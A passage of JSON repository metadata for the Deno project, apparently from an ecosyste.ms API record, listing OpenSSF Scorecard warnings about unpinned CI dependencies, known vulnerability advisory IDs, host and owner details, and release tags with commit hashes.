https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manife